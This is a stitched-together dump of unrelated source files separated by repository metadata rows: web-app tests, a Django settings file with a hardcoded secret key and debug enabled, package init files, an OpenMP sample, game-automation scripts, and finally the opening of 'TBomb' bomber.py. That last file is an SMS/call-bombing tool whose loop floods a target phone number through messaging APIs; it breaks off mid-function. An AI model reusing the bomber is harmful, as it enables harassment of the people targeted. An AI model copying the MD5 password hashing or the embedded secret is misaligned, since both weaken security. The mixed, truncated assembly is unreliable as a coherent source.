meta.session.commit()
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % (url('logout')) in response)
# test DD user
user = meta.session.query(User).filter(
User.email=='email@example.com').one()
user.status = constants.USER_STATUS_DEVELOPER
meta.session.commit()
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % (url('logout')) in response)
# test DM user
user = meta.session.query(User).filter(
User.email=='email@example.com').one()
user.status = constants.USER_STATUS_MAINTAINER
meta.session.commit()
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % (url('logout')) in response)
# test handling of deleted user
self._remove_example_user()
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
def test__gpg(self):
response = self.app.post(url('my'), {'form': 'gpg'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
response = self.app.post(url('login'), self._AUTHDATA)
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.gpg, None)
# upload GPG key with low strength
response = self.app.post(url('my'), {'form': 'gpg',
'delete_gpg': 0,
'commit': 'submit'},
upload_files = [('gpg', 'mykey.asc',
self._LOW_STRENGTH_GPGKEY)])
self.assertEquals(response.status_int, 200)
low_strength_msg = 'Key strength unacceptable in Debian Keyring. The minimum required key strength is'
self.assertTrue(low_strength_msg in response)
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.gpg, None)
# upload GPG key with high strength
response = self.app.post(url('my'), {'form': 'gpg',
'delete_gpg': 0,
'commit': 'submit'},
upload_files = [('gpg', 'mykey.asc',
self._HIGH_STRENGTH_GPGKEY)])
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.gpg, self._HIGH_STRENGTH_GPGKEY)
# test whether index page contains GPG delete link
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % (url('logout')) in response)
self.assertTrue(self._HIGH_STRENGTH_GPG_ID in response)
# delete GPG key
response = self.app.post(url('my'), {'form': 'gpg',
'delete_gpg': 1,
'commit': 'submit',
'gpg': ''})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.gpg, None)
def test__details(self):
response = self.app.post(url('my'), {'form': 'details'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
response = self.app.post(url('login'), self._AUTHDATA)
response = self.app.post(url('my'), {'form': 'details',
'name': '',
'email': 'email2@example.com',
'commit': 'submit'})
self.assertEquals(response.status_int, 200)
self.assertEquals(len(response.lxml.xpath('//input[@id="name" and @class="error"]')),
1)
response = self.app.post(url('my'), {'form': 'details',
'name': 'Test user2',
'email': 'email2@example.com',
'commit': 'submit'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(User.email=='email@example.com').first()
self.assertEquals(user, None)
user = meta.session.query(User).filter(User.email=='email2@example.com').one()
self.assertEquals(user.name, 'Test user2')
meta.session.delete(user)
meta.session.commit()
def test__password(self):
response = self.app.post(url('my'), {'form': 'password'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
response = self.app.post(url('login'), self._AUTHDATA)
response = self.app.post(url('my'), {'form': 'password',
'password_current': 'password',
'password_new': 'newpassword',
'password_confirm': 'newpassword',
'commit': 'submit'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(
User.email=='email@example.com').filter(
User.password==md5.new('newpassword').hexdigest()).one()
self.assertEquals(user.name, 'Test user')
def test__other_details(self):
response = self.app.post(url('my'), {'form': 'other_details'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
response = self.app.post(url('login'), self._AUTHDATA)
# test set ircnick
response = self.app.post(url('my'), {'form': 'other_details',
'country': '',
'ircnick': 'tester',
'jabber': '',
'commit': 'submit'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.ircnick, 'tester')
# test DM switch
response = self.app.post(url('my'), {'form': 'other_details',
'country': -1,
'ircnick': 'tester',
'jabber': '',
'status': 1,
'commit': 'submit'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.status, constants.USER_STATUS_MAINTAINER)
def test__invalid_form(self):
response = self.app.post(url('my'), {'form': 'invalid'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
response = self.app.post(url('login'), self._AUTHDATA)
response = self.app.post(url('my'), {'form': 'invalid'})
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % url('logout') in response)
| 53.189781
| 110
| 0.68485
|
4a18ecaf7e91c71a2171f99ee0428cf43f275a01
| 3,085
|
py
|
Python
|
wolff/settings.py
|
hanztura/wolff
|
d1fc568cd54453714f2ea61f5e99a58cc109ef65
|
[
"MIT"
] | 2
|
2022-01-21T15:29:20.000Z
|
2022-01-21T17:42:30.000Z
|
wolff/settings.py
|
hanztura/wolff
|
d1fc568cd54453714f2ea61f5e99a58cc109ef65
|
[
"MIT"
] | null | null | null |
wolff/settings.py
|
hanztura/wolff
|
d1fc568cd54453714f2ea61f5e99a58cc109ef65
|
[
"MIT"
] | 1
|
2020-04-14T09:36:25.000Z
|
2020-04-14T09:36:25.000Z
|
"""
Django settings for wolff project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'gbxv2l4190sg&lpr5uq2bvauhipo^bi@(k*3=tm%odemuu!izq'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'wolff.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'wolff.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| 25.495868
| 91
| 0.696921
|
4a18edcdf17b0c16da89722622f70505a7b3b92c
| 860
|
py
|
Python
|
climateeconomics/tests/witness_constraints_wrt_design_var_jacobian_pickle_dump.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2022-01-14T06:37:42.000Z
|
2022-01-14T06:37:42.000Z
|
climateeconomics/tests/witness_constraints_wrt_design_var_jacobian_pickle_dump.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
climateeconomics/tests/witness_constraints_wrt_design_var_jacobian_pickle_dump.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import climateeconomics.tests as jacobian_target
from sos_trades_core.tests.core.abstract_jacobian_unit_test import AbstractJacobianUnittest
if __name__ == '__main__':
AbstractJacobianUnittest.launch_all_pickle_generation(
jacobian_target, '_l2_test_constraints_gradient_witness.py')
| 33.076923
| 91
| 0.803488
|
4a18ef2cf7f8eaefacf3da5c0134dbfa5d270674
| 201
|
py
|
Python
|
util/__init__.py
|
ywchiao/shot
|
4b7c55bdcca44d05e07fffa59fe4e23364032cb5
|
[
"MIT"
] | null | null | null |
util/__init__.py
|
ywchiao/shot
|
4b7c55bdcca44d05e07fffa59fe4e23364032cb5
|
[
"MIT"
] | null | null | null |
util/__init__.py
|
ywchiao/shot
|
4b7c55bdcca44d05e07fffa59fe4e23364032cb5
|
[
"MIT"
] | 1
|
2020-03-27T02:07:27.000Z
|
2020-03-27T02:07:27.000Z
|
from .angle import Angle
from .circular_list import CircularList
from .node import Node
from .table import Table
from .vector_2d import Vector2D
from .module_loader import load_module
# __init__.py
| 18.272727
| 39
| 0.81592
|
4a18ef9334205d3f28adf97e9cd9203575408a26
| 1,112
|
py
|
Python
|
scripts/monty.py
|
TobiasFFThomsen/EncryptionAccelerator
|
bc9dd86cc83956530e5c2a9abc1cdb2501b346eb
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
scripts/monty.py
|
TobiasFFThomsen/EncryptionAccelerator
|
bc9dd86cc83956530e5c2a9abc1cdb2501b346eb
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
scripts/monty.py
|
TobiasFFThomsen/EncryptionAccelerator
|
bc9dd86cc83956530e5c2a9abc1cdb2501b346eb
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
# a*b mod n and a*b*c mod n via Montgomery multiplication (REDC)
a = 17
b = 18
c = 19
n = 37
# We compute c = a*b mod n by converting to Montgomery form.
# We choose R > n with gcd(R, n) = 1.
R = 64
R_inverse = 11  # R * R_inverse = 704, and 704 mod 37 = 1
result_expected_1 = a * b % n
print("a*b mod n: ", result_expected_1)
# For 3 case multiplications we get
# c = a*b*c mod n
result_expected_2 = a * b * c % n
print("a*b*c mod n: ", result_expected_2)
# Now with the Montgomery form and Redc algorithm
# Compute residues
a_resid = a*R % n
b_resid = b*R % n
c_resid = c*R % n
print("a-residual: ", a_resid)
print("b-residual: ", b_resid)
print("c-residual: ", c_resid)
# a_resid * b_resid ≡ a*b*R^2 (mod n), so two multiplications by R_inverse
# are needed to recover a*b mod n.
naive_expected = (a_resid * b_resid * R_inverse) % n * R_inverse % n
print("a*b mod n (Montgomery): ", naive_expected)
print()
k = (R * R_inverse - 1) // n  # n*k ≡ -1 (mod R)
print("k: ", k)
print("Redc algorithm:")
print("Redc(T) computes TR^-1 mod n")
def Redc(T, R, k, n):
    # Montgomery reduction: given T < R*n, returns T * R^-1 mod n.
    # m is chosen so that T + m*n is divisible by R (using n*k ≡ -1 mod R),
    # so the division below is exact integer division.
    m = (T % R) * k % R
    t = (T + m * n) // R
    if t >= n:
        return t - n
    else:
        return t
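# Sanity check (added): Redc converts out of Montgomery form, so
# Redc(a_resid, R, k, n) == a % n.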
print(Redc(Redc(a_resid*b_resid, R, k, n) * c_resid, R, k, n) * R_inverse % n)
| 22.693878
| 78
| 0.598022
|
4a18efa592a6ac74575e3ffc5090f84c206fd5a9
| 891
|
py
|
Python
|
env/Lib/site-packages/plotly/graph_objs/barpolar/__init__.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
venv/Lib/site-packages/plotly/graph_objs/barpolar/__init__.py
|
wakisalvador/constructed-misdirection
|
74779e9ec640a11bc08d5d1967c85ac4fa44ea5e
|
[
"Unlicense"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
venv/Lib/site-packages/plotly/graph_objs/barpolar/__init__.py
|
wakisalvador/constructed-misdirection
|
74779e9ec640a11bc08d5d1967c85ac4fa44ea5e
|
[
"Unlicense"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
import sys
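# On Python < 3.7 the submodules below are imported eagerly; on 3.7+ plotly's
# relative_import helper builds module-level __getattr__/__dir__ (PEP 562) so
# they are only loaded on first attribute access.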
if sys.version_info < (3, 7):
from ._hoverlabel import Hoverlabel
from ._legendgrouptitle import Legendgrouptitle
from ._marker import Marker
from ._selected import Selected
from ._stream import Stream
from ._unselected import Unselected
from . import hoverlabel
from . import legendgrouptitle
from . import marker
from . import selected
from . import unselected
else:
from _plotly_utils.importers import relative_import
__all__, __getattr__, __dir__ = relative_import(
__name__,
[".hoverlabel", ".legendgrouptitle", ".marker", ".selected", ".unselected"],
[
"._hoverlabel.Hoverlabel",
"._legendgrouptitle.Legendgrouptitle",
"._marker.Marker",
"._selected.Selected",
"._stream.Stream",
"._unselected.Unselected",
],
)
| 29.7
| 84
| 0.643098
|
4a18efbca2e37155ae687a931b6d1c0126ebf7df
| 345
|
py
|
Python
|
attack/crafter/__init__.py
|
nps1ngh/adversarial-bert-german-attacks-defense
|
3cca292ec4c3c07945f4198ae81e1f671462ed90
|
[
"Apache-2.0"
] | 2
|
2022-03-05T15:05:14.000Z
|
2022-03-06T11:19:47.000Z
|
attack/crafter/__init__.py
|
nps1ngh/adversarial-bert-german-attacks-defense
|
3cca292ec4c3c07945f4198ae81e1f671462ed90
|
[
"Apache-2.0"
] | null | null | null |
attack/crafter/__init__.py
|
nps1ngh/adversarial-bert-german-attacks-defense
|
3cca292ec4c3c07945f4198ae81e1f671462ed90
|
[
"Apache-2.0"
] | 1
|
2022-01-12T20:30:54.000Z
|
2022-01-12T20:30:54.000Z
|
from crafter.blackbox.character_level import BlackboxCharacterLevel
from crafter.blackbox.word_level import BlackboxWordLevelAttack
from crafter.whitebox.word_level import WhiteboxWordLevelAttack
from crafter.whitebox.character_level import WhiteboxCharacterLevel
from crafter.whitebox.baseline_word_level import BaselineWhiteboxWordLevelAttack
| 57.5
| 80
| 0.913043
|
4a18f034b96fbe3fd7943f2ba434326f65edefd8
| 564
|
py
|
Python
|
samples/mxm_openmp.py
|
dina-fouad/pyccel
|
f4d919e673b400442b9c7b81212b6fbef749c7b7
|
[
"MIT"
] | 206
|
2018-06-28T00:28:47.000Z
|
2022-03-29T05:17:03.000Z
|
samples/mxm_openmp.py
|
dina-fouad/pyccel
|
f4d919e673b400442b9c7b81212b6fbef749c7b7
|
[
"MIT"
] | 670
|
2018-07-23T11:02:24.000Z
|
2022-03-30T07:28:05.000Z
|
samples/mxm_openmp.py
|
dina-fouad/pyccel
|
f4d919e673b400442b9c7b81212b6fbef749c7b7
|
[
"MIT"
] | 19
|
2019-09-19T06:01:00.000Z
|
2022-03-29T05:17:06.000Z
|
# coding: utf-8
from numpy import zeros
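# The '#$ omp ...' lines below are pyccel-style OpenMP pragma comments; pyccel
# turns them into real OpenMP directives when this sample is translated/compiled.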
n = 800
m = 1600
p = 800
a = zeros((n,m))
b = zeros((m,p))
c = zeros((n,p))
#$ omp parallel
#$ omp for schedule(runtime)
for i in range(0, n):
for j in range(0, m):
a[i,j] = i-j
#$ omp end for nowait
#$ omp for schedule(runtime)
for i in range(0, m):
for j in range(0, p):
b[i,j] = i+j
#$ omp end for nowait
#$ omp for schedule(runtime)
for i in range(0, n):
for j in range(0, p):
for k in range(0, m):  # k runs over the shared dimension m of a (n x m) and b (m x p)
c[i,j] = c[i,j] + a[i,k]*b[k,j]
#$ omp end for
#$ omp end parallel
| 17.090909
| 43
| 0.544326
|
4a18f2c73ce72d1f7d537a2c348a02f0f9538fc9
| 4,152
|
py
|
Python
|
arknights/load_scenes.py
|
yue-litam/arknights-auto-scripts
|
4670b7a0c3e0b6b4c0e269ef13cf3d75c0b06a24
|
[
"Apache-2.0"
] | 24
|
2019-12-01T18:18:06.000Z
|
2021-09-25T06:47:02.000Z
|
arknights/load_scenes.py
|
yue-litam/arknights-auto-scripts
|
4670b7a0c3e0b6b4c0e269ef13cf3d75c0b06a24
|
[
"Apache-2.0"
] | 5
|
2020-05-22T12:09:59.000Z
|
2022-01-13T01:51:27.000Z
|
arknights/load_scenes.py
|
yue-litam/arknights-auto-scripts
|
4670b7a0c3e0b6b4c0e269ef13cf3d75c0b06a24
|
[
"Apache-2.0"
] | 6
|
2020-06-19T06:35:13.000Z
|
2021-11-29T06:04:06.000Z
|
import time
from common.logutil import logger
from common.scene import Scene
from common.tool import load_resource
def account_upgrade_detection(prefix):
return Scene('Detect account level-up page',
identify_image=load_resource('account_upgrade_detection.png', prefix))
def prts_disable_detection(prefix):
return Scene('Detect auto-deploy (PRTS) disabled', identify_image=load_resource('prts_disable_detection.png', prefix))
def level_info_detection(prefix):
image = load_resource('level_info_detection.png', prefix)
width, _ = image.shape[::-1]
return Scene('Detect target stage info page', identify_image=image, tap_offset_x=width)
def annihilation_detection(prefix):
    image = load_resource('annihilation_detection.png', prefix)
    return Scene('Detect Annihilation stage info page',
                 identify_image=image,
                 tap_offset_x=250,
                 tap_offset_y=30)
def annihilation_finish_detection(prefix):
return Scene('Detect Annihilation auto-deploy finished page', identify_image=load_resource('annihilation_finish_detection.png', prefix))
def prts_running_scene(prefix):
s = Scene('Detect auto-deploy battle in progress', action_type='none',
identify_image=load_resource('level_fighting_detection.png', prefix))
return s
def level_team_detection(config, context, prefix):
def before_action(_1, _2):
if 0 <= config.repeat_count_max <= context.repeated_count:
logger.info('\n\nPreset repeat count reached')
exit(0)
context.repeated_count += 1
logger.info('Run #%03d' % context.repeated_count)
s = Scene('Detect target stage auto-deploy squad page',
identify_image=load_resource('level_team_detection.png', prefix))
s.before_action = before_action
s.after_action = lambda _1, _2: time.sleep(2)
return s
def level_finish_detection(context, prefix):
def after_action(_1, _2):
context.flag_start_printed = False
s = Scene('Detect target stage auto-deploy finished page',
identify_image=load_resource('level_finish_detection.png', prefix))
s.after_action = after_action
return s
def exchange_intellect_by_pharmacy(config, context, prefix):
def before_action(_1, _2):
if config.use_pharmacy_max > 0:
if context.pharmacy_used >= config.use_pharmacy_max:
logger.info('Preset limit on sanity potions reached, exiting script')
exit(0)
else:
context.pharmacy_used += 1
else:
logger.info('Not enough sanity, exiting script automatically')
exit(0)
s = Scene("Detect 'restore sanity with a potion' prompt",
identify_image=load_resource('exchange_intellect_by_pharmacy.png', prefix),
tap_image=load_resource("exchange_intellect_confirm.png", prefix))
s.before_action = before_action
return s
def exchange_intellect_by_stone(config, context, prefix):
def before_action(_1, _2):
if config.use_stone_max > 0:
if context.stone_used >= config.use_stone_max:
logger.info('Preset limit on Originite Prime reached, exiting script')
exit(0)
else:
context.stone_used += 1
else:
logger.info('Not enough sanity, exiting script automatically')
exit(0)
s = Scene("Detect 'restore sanity with Originite Prime' prompt",
identify_image=load_resource('exchange_intellect_by_stone.png', prefix),
tap_image=load_resource("exchange_intellect_confirm.png", prefix))
s.before_action = before_action
return s
def load_scenes(prefix, config, context):
return [
prts_disable_detection(prefix), # auto-deploy disabled on a battle stage
account_upgrade_detection(prefix), # account level-up after a battle
annihilation_detection(prefix), # confirm deployment in Annihilation
annihilation_finish_detection(prefix), # Annihilation run finished
level_info_detection(prefix), # confirm deployment on the target stage
level_team_detection(config, context, prefix), # squad preview before a battle
level_finish_detection(context, prefix), # target stage finished after a battle
prts_running_scene(prefix), # run still in progress
exchange_intellect_by_pharmacy(config, context, prefix), # a potion is available when sanity is low
exchange_intellect_by_stone(config, context, prefix), # Originite Prime is available when sanity is low
]
| 35.186441
| 108
| 0.654383
|
4a18f2f8d81d27afb31d8a46f5d4fccf5ea6b00c
| 51
|
py
|
Python
|
src/brainy/version.py
|
pelkmanslab/brainy
|
eb088be9585734c66be5d6ef0b7127a923f4066c
|
[
"MIT"
] | null | null | null |
src/brainy/version.py
|
pelkmanslab/brainy
|
eb088be9585734c66be5d6ef0b7127a923f4066c
|
[
"MIT"
] | null | null | null |
src/brainy/version.py
|
pelkmanslab/brainy
|
eb088be9585734c66be5d6ef0b7127a923f4066c
|
[
"MIT"
] | null | null | null |
__version__ = '0.2.1'
brainy_version = __version__
| 17
| 28
| 0.764706
|
4a18f414dde63eff7e1a06931ef3b1725eecda3f
| 539
|
py
|
Python
|
tests/import/module_getattr.py
|
sebi5361/micropython
|
6c054cd124bc6229bee127128264dc0829dea53c
|
[
"MIT"
] | 198
|
2017-03-24T23:23:54.000Z
|
2022-01-07T07:14:00.000Z
|
tests/import/module_getattr.py
|
sebi5361/micropython
|
6c054cd124bc6229bee127128264dc0829dea53c
|
[
"MIT"
] | 509
|
2017-03-28T19:37:18.000Z
|
2022-03-31T20:31:43.000Z
|
tests/import/module_getattr.py
|
sebi5361/micropython
|
6c054cd124bc6229bee127128264dc0829dea53c
|
[
"MIT"
] | 187
|
2017-03-24T23:23:58.000Z
|
2022-02-25T01:48:45.000Z
|
# test __getattr__ on module
# ensure that does_not_exist doesn't exist to start with
this = __import__(__name__)
try:
this.does_not_exist
assert False
except AttributeError:
pass
# define __getattr__
def __getattr__(attr):
if attr == 'does_not_exist':
return False
raise AttributeError
# do feature test (will also test functionality if the feature exists)
if not hasattr(this, 'does_not_exist'):
print('SKIP')
raise SystemExit
# check that __getattr__ works as expected
print(this.does_not_exist)
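# For reference (PEP 562, CPython >= 3.7): a plain module-level __getattr__ is
# consulted whenever a normal attribute lookup fails, so a hypothetical config.py
#     def __getattr__(name):
#         if name == 'debug':
#             return False
#         raise AttributeError(name)
# makes `import config; config.debug` return False without `debug` being defined.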
| 22.458333
| 70
| 0.742115
|
4a18f493f277e47762b80bc38916a51ed63e45bd
| 36,723
|
py
|
Python
|
bomber.py
|
byanonyms/TBomb
|
649af75e6e41b6f8949ecac7a0ba6761be26acf3
|
[
"MIT"
] | 1
|
2020-04-21T09:24:41.000Z
|
2020-04-21T09:24:41.000Z
|
bomber.py
|
byanonyms/TBomb
|
649af75e6e41b6f8949ecac7a0ba6761be26acf3
|
[
"MIT"
] | null | null | null |
bomber.py
|
byanonyms/TBomb
|
649af75e6e41b6f8949ecac7a0ba6761be26acf3
|
[
"MIT"
] | 1
|
2020-10-11T08:55:32.000Z
|
2020-10-11T08:55:32.000Z
|
#!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To SpeedX And All Other Contributors Listed At https://github.com/TheSpeedX/TBomb
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
████████ ██████ ██
▒▒▒██▒▒▒ ██▒▒▒██ ██
██ ██ ██ ████ ██ ██ ██
██ ██████▒ ██▒▒██ ███ ███ █████
██ ██▒▒▒██ ██ ██ ██▒█▒██ ██▒▒██
██ ██ ██ ██ ██ ██ ▒ ██ ██ ██
██ ██████▒ ▒████▒ ██ ██ █████▒
▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒▒▒▒
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, maxlim):
global count_inf
while True:
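# crude file-based lock (racy, but matches the script's style): a thread waits
# while the proc.xxx sentinel exists, creates it, fires one request, removes it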
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo SpeedX >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
res = False
try:
    requests.get('https://www.google.com', verify=True)
except Exception:
    res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tTBomb Will Stop Now...\n\n')
banner()
exit()
def getapi(pn, lim, cc):
global country_codes
cc = str(cc).strip()
cnn = country_codes[cc]
